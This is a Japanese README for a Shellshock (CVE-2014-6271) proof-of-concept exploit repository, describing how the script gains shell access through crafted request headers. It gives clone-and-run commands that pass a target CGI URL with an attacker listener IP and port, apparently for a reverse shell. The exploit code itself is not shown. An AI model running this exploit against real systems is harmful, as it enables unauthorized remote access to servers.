
Shellshock エクスプロイト(CVE-2014-6271)
このリポジトリには、Unixベースのシステムに影響を与える脆弱性のエクスプロイトが含まれています。これは教育目的で作成された概念実証スクリプトであり、責任を持って使用する必要があることに注意してください。
このエクスプロイトは、Shellshock攻撃がどのように機能し、巧妙に細工されたリクエストヘッダーを通じてシステムへのシェルアクセスを得るためにどのように使用されるかを示すために設計されています。
このリポジトリは教育目的のみを目的としています。このコードや含まれる情報を悪意のある目的で使用しないでください。常に倫理的なガイドラインに従い、法律を尊重してください。
使用方法:
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
例:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
前提条件:
このリポジトリをローカルマシンにクローンします。
git clone https://github.com/AlissonFaoli/Shellshock.git
プロジェクトディレクトリに移動します。
cd Shellshock
shellshock.pyスクリプトを実行します。
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
このエクスプロイトはMITライセンスの下で公開されています。詳細についてはLICENSEファイルを参照してください。
このエクスプロイトについてご質問やご懸念がございましたら、お気軽に著者までご連絡ください